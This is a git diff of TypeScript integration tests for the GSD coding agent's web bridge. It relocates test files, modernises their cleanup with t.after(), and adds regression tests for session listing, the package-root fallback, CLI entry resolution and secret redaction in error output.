+      GSD_WEB_TEST_AUTO_DASHBOARD_MODULE: modulePath,
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+    },
+  });
+
+  assert.equal(result.active, false, "active must remain false when no session lock exists");
+  assert.equal(result.paused, false);
+});
+
+test("#2705: subprocess reports active=false but paused-session.json exists → reconcile to paused=true", async (t) => {
+  const fixture = makeTempFixture();
+  t.after(() => fixture.cleanup());
+
+  const modulePath = writeAutoModule(fixture.projectCwd, INACTIVE_PAYLOAD);
+
+  writePausedSession(fixture.projectCwd, {
+    milestoneId: "M001",
+    pausedAt: new Date().toISOString(),
+    stepMode: false,
+  });
+
+  const result = await collectAuthoritativeAutoDashboardData(repoRoot, {
+    env: {
+      ...process.env,
+      GSD_WEB_TEST_AUTO_DASHBOARD_MODULE: modulePath,
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+    },
+  });
+
+  assert.equal(result.paused, true, "paused must be reconciled to true when paused-session.json exists");
+  assert.equal(result.active, false, "active must remain false when paused (paused overrides active)");
+});
+
+test("#2705: subprocess reports active=true → no reconciliation needed", async (t) => {
+  const fixture = makeTempFixture();
+  t.after(() => fixture.cleanup());
+
+  const activePayload = {
+    active: true,
+    paused: false,
+    stepMode: true,
+    startTime: 1000,
+    elapsed: 500,
+    currentUnit: { type: "execute-task", id: "M001/S01/T01", startedAt: 1000 },
+    completedUnits: [],
+    basePath: fixture.projectCwd,
+    totalCost: 1.5,
+    totalTokens: 1000,
+  };
+  const modulePath = writeAutoModule(fixture.projectCwd, activePayload);
+
+  const result = await collectAuthoritativeAutoDashboardData(repoRoot, {
+    env: {
+      ...process.env,
+      GSD_WEB_TEST_AUTO_DASHBOARD_MODULE: modulePath,
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+    },
+  });
+
+  assert.equal(result.active, true, "active should remain true when subprocess already reports it");
+});
+
+test("#2705: session lock exists but PID is dead → remains inactive (stale lock)", async (t) => {
+  const fixture = makeTempFixture();
+  t.after(() => fixture.cleanup());
+
+  const modulePath = writeAutoModule(fixture.projectCwd, INACTIVE_PAYLOAD);
+
+  // Use a PID that is almost certainly dead.
+  writeSessionLock(fixture.projectCwd, {
+    pid: 999999999,
+    startedAt: new Date().toISOString(),
+    unitType: "execute-task",
+    unitId: "M001/S01/T01",
+    unitStartedAt: new Date().toISOString(),
+  });
+
+  const result = await collectAuthoritativeAutoDashboardData(repoRoot, {
+    env: {
+      ...process.env,
+      GSD_WEB_TEST_AUTO_DASHBOARD_MODULE: modulePath,
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+    },
+  });
+
+  assert.equal(result.active, false, "active must remain false when session lock PID is dead (stale lock)");
+});
diff --git a/src/tests/web-boot-node24.test.ts b/src/tests/integration/web-boot-node24.test.ts
similarity index 85%
rename from src/tests/web-boot-node24.test.ts
rename to src/tests/integration/web-boot-node24.test.ts
index f103070cf..8dda73414 100644
--- a/src/tests/web-boot-node24.test.ts
+++ b/src/tests/integration/web-boot-node24.test.ts
@@ -1,7 +1,7 @@
 import test from "node:test"
 import assert from "node:assert/strict"
 
-import { resolveTypeStrippingFlag } from "../web/ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag } from "../../web/ts-subprocess-flags.ts"
 
 // ---------------------------------------------------------------------------
 // Bug 1 — resolveTypeStrippingFlag selects the correct flag
@@ -151,3 +151,26 @@ test("boot route returns { error } JSON on handler failure", async () => {
     "boot route must return status 500 on error",
   )
 })
+
+// ---------------------------------------------------------------------------
+// Bug 4 — bridge-service must import readdirSync for session listing (#1936)
+// ---------------------------------------------------------------------------
+
+test("bridge-service imports readdirSync from node:fs (#1936)", async () => {
+  // The boot payload calls listProjectSessions which uses readdirSync.
+  // A missing import causes ReferenceError → HTTP 500 on /api/boot.
+  const { readFileSync } = await import("node:fs")
+  const { join } = await import("node:path")
+
+  const bridgeSource = readFileSync(
+    join(process.cwd(), "src", "web", "bridge-service.ts"),
+    "utf-8",
+  )
+
+  assert.match(
+    bridgeSource,
+    /import\s*\{[^}]*readdirSync[^}]*\}\s*from\s*["']node:fs["']/,
+    "bridge-service.ts must import readdirSync from node:fs — " +
+      "removing it breaks /api/boot with ReferenceError (see #1936)",
+  )
+})
diff --git a/src/tests/web-bridge-contract.test.ts b/src/tests/integration/web-bridge-contract.test.ts
similarity index 65%
rename from src/tests/web-bridge-contract.test.ts
rename to src/tests/integration/web-bridge-contract.test.ts
index 1f29ad4ab..3de7fd6f6 100644
--- a/src/tests/web-bridge-contract.test.ts
+++ b/src/tests/integration/web-bridge-contract.test.ts
@@ -8,12 +8,12 @@ import { PassThrough } from "node:stream";
 import { StringDecoder } from "node:string_decoder";
 
 const repoRoot = process.cwd();
-const bridge = await import("../web/bridge-service.ts");
-const onboarding = await import("../web/onboarding-service.ts");
+const bridge = await import("../../web/bridge-service.ts");
+const onboarding = await import("../../web/onboarding-service.ts");
 const { AuthStorage } = await import("@gsd/pi-coding-agent");
-const bootRoute = await import("../../web/app/api/boot/route.ts");
-const commandRoute = await import("../../web/app/api/session/command/route.ts");
-const eventsRoute = await import("../../web/app/api/session/events/route.ts");
+const bootRoute = await import("../../../web/app/api/boot/route.ts");
+const commandRoute = await import("../../../web/app/api/session/command/route.ts");
+const eventsRoute = await import("../../../web/app/api/session/events/route.ts");
 
 class FakeRpcChild extends EventEmitter {
   stdin = new PassThrough();
@@ -259,7 +259,7 @@ async function readSseEvents(response: Response, count: number): Promise<any[]>
   return events;
 }
 
-test("/api/boot returns current-project workspace data, resumable sessions, onboarding seam, and bridge snapshot", async () => {
+test("/api/boot returns current-project workspace data, resumable sessions, onboarding seam, and bridge snapshot", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-boot", "Resume Me");
   const harness = createHarness((command, current) => {
@@ -304,39 +304,39 @@ test("/api/boot returns current-project workspace data, resumable sessions, onbo
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const response = await bootRoute.GET();
-    assert.equal(response.status, 200);
-    const payload = await response.json() as any;
-
-    assert.equal(payload.project.cwd, fixture.projectCwd);
-    assert.equal(payload.project.sessionsDir, fixture.sessionsDir);
-    assert.equal(payload.workspace.active.milestoneId, "M001");
-    assert.equal(payload.workspace.active.sliceId, "S01");
-    assert.equal(payload.workspace.active.taskId, "T01");
-    assert.equal(payload.onboardingNeeded, false);
-    assert.equal(payload.resumableSessions.length, 1);
-    assert.equal(payload.resumableSessions[0].id, "sess-boot");
-    assert.equal(payload.resumableSessions[0].path, sessionPath);
-    assert.equal(payload.resumableSessions[0].isActive, true);
-    assert.equal("firstMessage" in payload.resumableSessions[0], false);
-    assert.equal("allMessagesText" in payload.resumableSessions[0], false);
-    assert.equal("parentSessionPath" in payload.resumableSessions[0], false);
-    assert.equal("depth" in payload.resumableSessions[0], false);
-    assert.equal(payload.bridge.phase, "ready");
-    assert.equal(payload.bridge.activeSessionId, "sess-boot");
-    assert.equal(payload.bridge.sessionState.sessionId, "sess-boot");
-    assert.equal(payload.bridge.sessionState.autoRetryEnabled, false);
-    assert.equal(payload.bridge.sessionState.retryInProgress, false);
-    assert.equal(payload.bridge.sessionState.retryAttempt, 0);
-    assert.equal(harness.spawnCalls, 1);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const response = await bootRoute.GET();
+  assert.equal(response.status, 200);
+  const payload = await response.json() as any;
+
+  assert.equal(payload.project.cwd, fixture.projectCwd);
+  assert.equal(payload.project.sessionsDir, fixture.sessionsDir);
+  assert.equal(payload.workspace.active.milestoneId, "M001");
+  assert.equal(payload.workspace.active.sliceId, "S01");
+  assert.equal(payload.workspace.active.taskId, "T01");
+  assert.equal(payload.onboardingNeeded, false);
+  assert.equal(payload.resumableSessions.length, 1);
+  assert.equal(payload.resumableSessions[0].id, "sess-boot");
+  assert.equal(payload.resumableSessions[0].path, sessionPath);
+  assert.equal(payload.resumableSessions[0].isActive, true);
+  assert.equal("firstMessage" in payload.resumableSessions[0], false);
+  assert.equal("allMessagesText" in payload.resumableSessions[0], false);
+  assert.equal("parentSessionPath" in payload.resumableSessions[0], false);
+  assert.equal("depth" in payload.resumableSessions[0], false);
+  assert.equal(payload.bridge.phase, "ready");
+  assert.equal(payload.bridge.activeSessionId, "sess-boot");
+  assert.equal(payload.bridge.sessionState.sessionId, "sess-boot");
+  assert.equal(payload.bridge.sessionState.autoRetryEnabled, false);
+  assert.equal(payload.bridge.sessionState.retryInProgress, false);
+  assert.equal(payload.bridge.sessionState.retryAttempt, 0);
+  assert.equal(harness.spawnCalls, 1);
 });
 
-test("/api/boot uses the authoritative auto helper by default and stays snapshot-shaped", async () => {
+test("/api/boot uses the authoritative auto helper by default and stays snapshot-shaped", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-auto", "Authoritative Auto");
   const authoritativeAuto = {
@@ -394,27 +394,27 @@ test("/api/boot uses the authoritative auto helper by default and stays snapshot
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const response = await bootRoute.GET();
-    assert.equal(response.status, 200);
-    const payload = await response.json() as any;
-
-    assert.deepEqual(
-      Object.keys(payload).sort(),
-      ["auto", "bridge", "onboarding", "onboardingNeeded", "project", "projectDetection", "resumableSessions", "workspace"],
-      "/api/boot must remain snapshot-shaped while auto truth becomes authoritative",
-    );
-    assert.deepEqual(payload.auto, authoritativeAuto, "default boot path should read authoritative auto dashboard data");
-    assert.notEqual(payload.auto.startTime, 0, "authoritative auto helper must replace the all-zero fallback payload");
-    assert.equal("recovery" in payload, false, "/api/boot should not grow a recovery diagnostics payload in T01");
-    assert.equal("liveState" in payload, false, "/api/boot should not expose live invalidation payloads directly");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const response = await bootRoute.GET();
+  assert.equal(response.status, 200);
+  const payload = await response.json() as any;
+
+  assert.deepEqual(
+    Object.keys(payload).sort(),
+    ["auto", "bridge", "onboarding", "onboardingNeeded", "project", "projectDetection", "resumableSessions", "workspace"],
+    "/api/boot must remain snapshot-shaped while auto truth becomes authoritative",
+  );
+  assert.deepEqual(payload.auto, authoritativeAuto, "default boot path should read authoritative auto dashboard data");
+  assert.notEqual(payload.auto.startTime, 0, "authoritative auto helper must replace the all-zero fallback payload");
+  assert.equal("recovery" in payload, false, "/api/boot should not grow a recovery diagnostics payload in T01");
+  assert.equal("liveState" in payload, false, "/api/boot should not expose live invalidation payloads directly");
 });
 
-test("bridge service is a singleton for the project runtime and /api/session/command forwards real RPC responses", async () => {
+test("bridge service is a singleton for the project runtime and /api/session/command forwards real RPC responses", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-shared", "Shared Session");
   const harness = createHarness((command, current) => {
@@ -459,40 +459,40 @@ test("bridge service is a singleton for the project runtime and /api/session/com
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const serviceA = bridge.getProjectBridgeService();
-    const serviceB = bridge.getProjectBridgeService();
-    assert.strictEqual(serviceA, serviceB);
-
-    const first = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "get_state" }),
-      }),
-    );
-    const firstBody = await first.json() as any;
-    assert.equal(first.status, 200);
-    assert.equal(firstBody.success, true);
-    assert.equal(firstBody.command, "get_state");
-    assert.equal(firstBody.data.sessionId, "sess-shared");
-
-    const second = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "get_state" }),
-      }),
-    );
-    const secondBody = await second.json() as any;
-    assert.equal(second.status, 200);
-    assert.equal(secondBody.data.sessionId, "sess-shared");
-    assert.equal(harness.spawnCalls, 1);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const serviceA = bridge.getProjectBridgeService();
+  const serviceB = bridge.getProjectBridgeService();
+  assert.strictEqual(serviceA, serviceB);
+
+  const first = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "get_state" }),
+    }),
+  );
+  const firstBody = await first.json() as any;
+  assert.equal(first.status, 200);
+  assert.equal(firstBody.success, true);
+  assert.equal(firstBody.command, "get_state");
+  assert.equal(firstBody.data.sessionId, "sess-shared");
+
+  const second = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "get_state" }),
+    }),
+  );
+  const secondBody = await second.json() as any;
+  assert.equal(second.status, 200);
+  assert.equal(secondBody.data.sessionId, "sess-shared");
+  assert.equal(harness.spawnCalls, 1);
 });
 
-test("/api/session/events streams bridge status, agent events, and extension_ui_request payloads over SSE", async () => {
+test("/api/session/events streams bridge status, agent events, and extension_ui_request payloads over SSE", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-events", "Events Session");
   const harness = createHarness((command, current) => {
@@ -537,38 +537,38 @@ test("/api/session/events streams bridge status, agent events, and extension_ui_
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const controller = new AbortController();
-    const response = await eventsRoute.GET(
-      new Request("http://localhost/api/session/events", { signal: controller.signal }),
-    );
-
-    harness.emit({ type: "agent_start" });
-    harness.emit({
-      type: "extension_ui_request",
-      id: "ui-1",
-      method: "confirm",
-      title: "Need approval",
-      message: "Continue?",
-    });
-
-    const events = await readSseEvents(response, 3);
-    assert.equal(events[0].type, "bridge_status");
-    assert.equal(events[0].bridge.connectionCount, 1);
-    assert.ok(events.some((event) => event.type === "agent_start"));
-    assert.ok(events.some((event) => event.type === "extension_ui_request"));
-
-    assert.equal(bridge.getProjectBridgeService().getSnapshot().connectionCount, 1);
-    controller.abort();
-    await waitForMicrotasks();
-    assert.equal(bridge.getProjectBridgeService().getSnapshot().connectionCount, 0);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const controller = new AbortController();
+  const response = await eventsRoute.GET(
+    new Request("http://localhost/api/session/events", { signal: controller.signal }),
+  );
+
+  harness.emit({ type: "agent_start" });
+  harness.emit({
+    type: "extension_ui_request",
+    id: "ui-1",
+    method: "confirm",
+    title: "Need approval",
+    message: "Continue?",
+  });
+
+  const events = await readSseEvents(response, 3);
+  assert.equal(events[0].type, "bridge_status");
+  assert.equal(events[0].bridge.connectionCount, 1);
+  assert.ok(events.some((event) => event.type === "agent_start"));
+  assert.ok(events.some((event) => event.type === "extension_ui_request"));
+
+  assert.equal(bridge.getProjectBridgeService().getSnapshot().connectionCount, 1);
+  controller.abort();
+  await waitForMicrotasks();
+  assert.equal(bridge.getProjectBridgeService().getSnapshot().connectionCount, 0);
 });
 
-test("bridge command/runtime failures are inspectable and redact secret material", async () => {
+test("bridge command/runtime failures are inspectable and redact secret material", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-failure", "Failure Session");
 
@@ -631,31 +631,105 @@ test("bridge command/runtime failures are inspectable and redact secret material
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const response = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "bash", command: "echo test" }),
-      }),
-    );
-    const body = await response.json() as any;
-
-    assert.equal(response.status, 502);
-    assert.equal(body.success, false);
-    assert.match(body.error, /authentication failed/i);
-    assert.doesNotMatch(body.error, /sk-test-command-secret-9999/);
-
-    harness.stderr("fatal runtime error: sk-after-attach-12345");
-    harness.exit(1);
-    await waitForMicrotasks();
-
-    const snapshot = bridge.getProjectBridgeService().getSnapshot();
-    assert.equal(snapshot.phase, "failed");
-    assert.equal(snapshot.lastError?.afterSessionAttachment, true);
-    assert.doesNotMatch(snapshot.lastError?.message ?? "", /sk-after-attach-12345|sk-test-command-secret-9999/);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const response = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "bash", command: "echo test" }),
+    }),
+  );
+  const body = await response.json() as any;
+
+  assert.equal(response.status, 502);
+  assert.equal(body.success, false);
+  assert.match(body.error, /authentication failed/i);
+  assert.doesNotMatch(body.error, /sk-test-command-secret-9999/);
+
+  harness.stderr("fatal runtime error: sk-after-attach-12345");
+  harness.exit(1);
+  await waitForMicrotasks();
+
+  const snapshot = bridge.getProjectBridgeService().getSnapshot();
+  assert.equal(snapshot.phase, "failed");
+  assert.equal(snapshot.lastError?.afterSessionAttachment, true);
+  assert.doesNotMatch(snapshot.lastError?.message ?? "", /sk-after-attach-12345|sk-test-command-secret-9999/);
+});
+
+// ---------------------------------------------------------------------------
+// Bug — readdirSync must be available in bridge-service for session listing
+// (Fixes #1936: /api/boot returns 500 when readdirSync is missing)
+// ---------------------------------------------------------------------------
+
+test("/api/boot lists sessions from the real filesystem via readdirSync (#1936)", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-fs", "FS Session");
+  const harness = createHarness((command, current) => {
+    if (command.type === "get_state") {
+      current.emit({
+        id: command.id,
+        type: "response",
+        command: "get_state",
+        success: true,
+        data: {
+          sessionId: "sess-fs",
+          sessionFile: sessionPath,
+          thinkingLevel: "off",
+          isStreaming: false,
+          isCompacting: false,
+          steeringMode: "all",
+          followUpMode: "all",
+          autoCompactionEnabled: false,
+          autoRetryEnabled: false,
+          retryInProgress: false,
+          retryAttempt: 0,
+          messageCount: 0,
+          pendingMessageCount: 0,
+        },
+      });
+      return;
+    }
+    assert.fail(`unexpected command during boot: ${command.type}`);
+  });
+
+  // Deliberately omit listSessions so the real listProjectSessions (which
+  // calls readdirSync) is exercised. If readdirSync is missing from the
+  // bridge-service node:fs import, this test will throw ReferenceError.
+  bridge.configureBridgeServiceForTests({
+    env: {
+      ...process.env,
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+      GSD_WEB_PROJECT_SESSIONS_DIR: fixture.sessionsDir,
+      GSD_WEB_PACKAGE_ROOT: repoRoot,
+    },
+    spawn: harness.spawn,
+    indexWorkspace: async () => fakeWorkspaceIndex(),
+    getAutoDashboardData: () => fakeAutoDashboardData(),
+    getOnboardingNeeded: () => false,
+  });
+
+  t.after(async () => {
+    await bridge.resetBridgeServiceForTests();
+    fixture.cleanup();
+  });
+
+  const response = await bootRoute.GET();
+  assert.equal(response.status, 200, "/api/boot must not return 500 — readdirSync must be available");
+  const payload = await response.json() as any;
+
+  // The real listProjectSessions should have found the session file via readdirSync
+  assert.ok(
+    Array.isArray(payload.resumableSessions),
+    "boot payload must include resumableSessions array",
+  );
+  assert.equal(
+    payload.resumableSessions.length,
+    1,
+    "readdirSync-based session listing must find the test session file",
+  );
+  assert.equal(payload.resumableSessions[0].id, "sess-fs");
 });
diff --git a/src/tests/integration/web-bridge-package-root.test.ts b/src/tests/integration/web-bridge-package-root.test.ts
new file mode 100644
index 000000000..8ccab075c
--- /dev/null
+++ b/src/tests/integration/web-bridge-package-root.test.ts
@@ -0,0 +1,70 @@
+/**
+ * Regression tests for the default package root fallback in bridge-service.
+ *
+ * Issue: gsd-build/gsd-2#1881
+ * The standalone Next.js bundle bakes import.meta.url at build time with the
+ * CI runner's absolute path.  On Windows, fileURLToPath() rejects the Unix
+ * file:// URL at module load time, 500-ing all API routes.
+ *
+ * The fix makes the fallback lazy and catch-guarded so the module loads safely
+ * on any OS regardless of what import.meta.url resolved to at build time.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { resolve } from "node:path";
+
+const bridge = await import("../../web/bridge-service.ts");
+
+test("resolveBridgeRuntimeConfig uses GSD_WEB_PACKAGE_ROOT when set", () => {
+  const env = {
+    GSD_WEB_PACKAGE_ROOT: "/custom/package/root",
+    GSD_WEB_PROJECT_CWD: "/some/project",
+  } as unknown as NodeJS.ProcessEnv;
+
+  const config = bridge.resolveBridgeRuntimeConfig(env);
+  assert.equal(config.packageRoot, "/custom/package/root");
+});
+
+test("resolveBridgeRuntimeConfig falls back to lazy default when GSD_WEB_PACKAGE_ROOT is absent", () => {
+  // Reset the memoized value so we exercise the lazy computation path.
+  bridge.resetDefaultPackageRootForTests();
+
+  const env = {
+    GSD_WEB_PROJECT_CWD: "/some/project",
+  } as unknown as NodeJS.ProcessEnv;
+
+  // Should not throw — the lazy getter catches cross-platform failures.
+  const config = bridge.resolveBridgeRuntimeConfig(env);
+  assert.equal(typeof config.packageRoot, "string");
+  assert.ok(config.packageRoot.length > 0, "packageRoot must be a non-empty string");
+});
+
+test("lazy default package root is an absolute path", () => {
+  bridge.resetDefaultPackageRootForTests();
+
+  const env = {
+    GSD_WEB_PROJECT_CWD: "/some/project",
+  } as unknown as NodeJS.ProcessEnv;
+
+  const config = bridge.resolveBridgeRuntimeConfig(env);
+  // resolve() returns the same path if already absolute.
+  assert.equal(config.packageRoot, resolve(config.packageRoot));
+});
+
+test("lazy default package root is memoized across calls", () => {
+  bridge.resetDefaultPackageRootForTests();
+
+  const env = {} as unknown as NodeJS.ProcessEnv;
+
+  const first = bridge.resolveBridgeRuntimeConfig(env).packageRoot;
+  const second = bridge.resolveBridgeRuntimeConfig(env).packageRoot;
+  assert.equal(first, second, "memoized value should be stable across calls");
+});
+
+test("module loads without throwing (regression: eager fileURLToPath crash)", () => {
+  // The fact that we can import bridge-service at the top of this file without
+  // an unhandled exception is itself the primary regression gate.  This test
+  // makes that contract explicit.
+  assert.ok(typeof bridge.resolveBridgeRuntimeConfig === "function");
+});
diff --git a/src/tests/web-bridge-terminal-contract.test.ts b/src/tests/integration/web-bridge-terminal-contract.test.ts
similarity index 77%
rename from src/tests/web-bridge-terminal-contract.test.ts
rename to src/tests/integration/web-bridge-terminal-contract.test.ts
index 8ac38db2d..3104c5329 100644
--- a/src/tests/web-bridge-terminal-contract.test.ts
+++ b/src/tests/integration/web-bridge-terminal-contract.test.ts
@@ -8,10 +8,10 @@ import { PassThrough } from "node:stream";
 import { StringDecoder } from "node:string_decoder";
 
 const repoRoot = process.cwd();
-const bridge = await import("../web/bridge-service.ts");
-const streamRoute = await import("../../web/app/api/bridge-terminal/stream/route.ts");
-const inputRoute = await import("../../web/app/api/bridge-terminal/input/route.ts");
-const resizeRoute = await import("../../web/app/api/bridge-terminal/resize/route.ts");
+const bridge = await import("../../web/bridge-service.ts");
+const streamRoute = await import("../../../web/app/api/bridge-terminal/stream/route.ts");
+const inputRoute = await import("../../../web/app/api/bridge-terminal/input/route.ts");
+const resizeRoute = await import("../../../web/app/api/bridge-terminal/resize/route.ts");
 
 class FakeRpcChild extends EventEmitter {
   stdin = new PassThrough();
@@ -143,7 +143,7 @@ function createHarness(onCommand: (command: any, harness: ReturnType<typeof crea
   return harness;
 }
 
-test("/api/bridge-terminal/stream attaches to the main bridge runtime and forwards native terminal output", async () => {
+test("/api/bridge-terminal/stream attaches to the main bridge runtime and forwards native terminal output", async (t) => {
   const fixture = makeWorkspaceFixture();
   const harness = createHarness((command, current) => {
     if (command.type === "get_state") {
@@ -197,25 +197,25 @@ test("/api/bridge-terminal/stream attaches to the main bridge runtime and forwar
     spawn: harness.spawn,
   });
 
-  try {
-    const response = await streamRoute.GET(
-      new Request("http://localhost/api/bridge-terminal/stream?cols=132&rows=41"),
-    );
-
-    const events = await readSseEvents(response, 2);
-    assert.equal(events[0].type, "connected");
-    assert.equal(events[1].type, "output");
-    assert.match(events[1].data, /native main session/);
-
-    assert.ok(harness.commands.some((command) => command.type === "terminal_resize" && command.cols === 132 && command.rows === 41));
-    assert.ok(harness.commands.some((command) => command.type === "terminal_redraw"));
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const response = await streamRoute.GET(
+    new Request("http://localhost/api/bridge-terminal/stream?cols=132&rows=41"),
+  );
+
+  const events = await readSseEvents(response, 2);
+  assert.equal(events[0].type, "connected");
+  assert.equal(events[1].type, "output");
+  assert.match(events[1].data, /native main session/);
+
+  assert.ok(harness.commands.some((command) => command.type === "terminal_resize" && command.cols === 132 && command.rows === 41));
+  assert.ok(harness.commands.some((command) => command.type === "terminal_redraw"));
 });
 
-test("bridge-terminal input and resize routes forward browser terminal traffic onto the authoritative bridge session", async () => {
+test("bridge-terminal input and resize routes forward browser terminal traffic onto the authoritative bridge session", async (t) => {
   const fixture = makeWorkspaceFixture();
   const harness = createHarness((command, current) => {
     if (command.type === "get_state") {
@@ -266,32 +266,32 @@ test("bridge-terminal input and resize routes forward browser terminal traffic o
     spawn: harness.spawn,
   });
 
-  try {
-    const inputResponse = await inputRoute.POST(
-      new Request("http://localhost/api/bridge-terminal/input", {
-        method: "POST",
-        body: JSON.stringify({ data: "hello from xterm" }),
-      }),
-    );
-    assert.equal(inputResponse.status, 200);
-
-    const resizeResponse = await resizeRoute.POST(
-      new Request("http://localhost/api/bridge-terminal/resize", {
-        method: "POST",
-        body: JSON.stringify({ cols: 140, rows: 48 }),
-      }),
-    );
-    assert.equal(resizeResponse.status, 200);
-
-    assert.ok(harness.commands.some((command) => command.type === "terminal_input" && command.data === "hello from xterm"));
-    assert.ok(harness.commands.some((command) => command.type === "terminal_resize" && command.cols === 140 && command.rows === 48));
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const inputResponse = await inputRoute.POST(
+    new Request("http://localhost/api/bridge-terminal/input", {
+      method: "POST",
+      body: JSON.stringify({ data: "hello from xterm" }),
+    }),
+  );
+  assert.equal(inputResponse.status, 200);
+
+  const resizeResponse = await resizeRoute.POST(
+    new Request("http://localhost/api/bridge-terminal/resize", {
+      method: "POST",
+      body: JSON.stringify({ cols: 140, rows: 48 }),
+    }),
+  );
+  assert.equal(resizeResponse.status, 200);
+
+  assert.ok(harness.commands.some((command) => command.type === "terminal_input" && command.data === "hello from xterm"));
+  assert.ok(harness.commands.some((command) => command.type === "terminal_resize" && command.cols === 140 && command.rows === 48));
 });
 
-test("session_state_changed from the native main-session TUI refreshes bridge state and emits matching live invalidations", async () => {
+test("session_state_changed from the native main-session TUI refreshes bridge state and emits matching live invalidations", async (t) => {
   const fixture = makeWorkspaceFixture();
   const sessionAPath = join(fixture.sessionsDir, "sess-a.jsonl");
   const sessionBPath = join(fixture.sessionsDir, "sess-b.jsonl");
@@ -338,30 +338,30 @@ test("session_state_changed from the native main-session TUI refreshes bridge st
     spawn: harness.spawn,
   });
 
-  try {
-    const service = bridge.getProjectBridgeService();
-    const unsubscribe = service.subscribe((event) => {
-      seenEvents.push(event as { type?: string; reason?: string });
-    });
-
-    await service.ensureStarted();
-    activeSessionId = "sess-b";
-    activeSessionFile = sessionBPath;
-    harness.emit({ type: "session_state_changed", reason: "switch_session" });
-
-    await waitFor(() => {
-      const snapshot = service.getSnapshot();
-      return snapshot.activeSessionId === "sess-b" ? snapshot : null;
-    });
-
-    assert.ok(
-      seenEvents.some((event) => event.type === "live_state_invalidation" && event.reason === "switch_session"),
-      "switch_session live_state_invalidation should be emitted when the native TUI changes the active session",
-    );
-
-    unsubscribe();
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const service = bridge.getProjectBridgeService();
+  const unsubscribe = service.subscribe((event) => {
+    seenEvents.push(event as { type?: string; reason?: string });
+  });
+
+  await service.ensureStarted();
+  activeSessionId = "sess-b";
+  activeSessionFile = sessionBPath;
+  harness.emit({ type: "session_state_changed", reason: "switch_session" });
+
+  await waitFor(() => {
+    const snapshot = service.getSnapshot();
+    return snapshot.activeSessionId === "sess-b" ? snapshot : null;
+  });
+
+  assert.ok(
+    seenEvents.some((event) => event.type === "live_state_invalidation" && event.reason === "switch_session"),
+    "switch_session live_state_invalidation should be emitted when the native TUI changes the active session",
+  );
+
+  unsubscribe();
 });
diff --git a/src/tests/integration/web-cli-entry.test.ts b/src/tests/integration/web-cli-entry.test.ts
new file mode 100644
index 000000000..6c69928a0
--- /dev/null
+++ b/src/tests/integration/web-cli-entry.test.ts
@@ -0,0 +1,99 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { pathToFileURL } from "node:url";
+
+const { resolveGsdCliEntry } = await import("../../web/cli-entry.ts");
+
+function makeFixture(paths: string[]): string {
+  const root = mkdtempSync(join(tmpdir(), "gsd-cli-entry-"));
+  for (const relativePath of paths) {
+    const fullPath = join(root, relativePath);
+    mkdirSync(join(fullPath, ".."), { recursive: true });
+    writeFileSync(fullPath, "// fixture\n");
+  }
+  return root;
+}
+
+test("resolveGsdCliEntry prefers the built loader for packaged standalone interactive sessions", (t) => {
+  const packageRoot = makeFixture([
+    "dist/loader.js",
+    "src/loader.ts",
+    "src/resources/extensions/gsd/tests/resolve-ts.mjs",
+  ]);
+
+  t.after(() => { rmSync(packageRoot, { recursive: true, force: true }); });
+
+  const entry = resolveGsdCliEntry({
+    packageRoot,
+    cwd: "/tmp/project-a",
+    execPath: "/custom/node",
+    hostKind: "packaged-standalone",
+    mode: "interactive",
+  });
+
+  assert.deepEqual(entry, {
+    command: "/custom/node",
+    args: [join(packageRoot, "dist", "loader.js")],
+    cwd: "/tmp/project-a",
+  });
+});
+
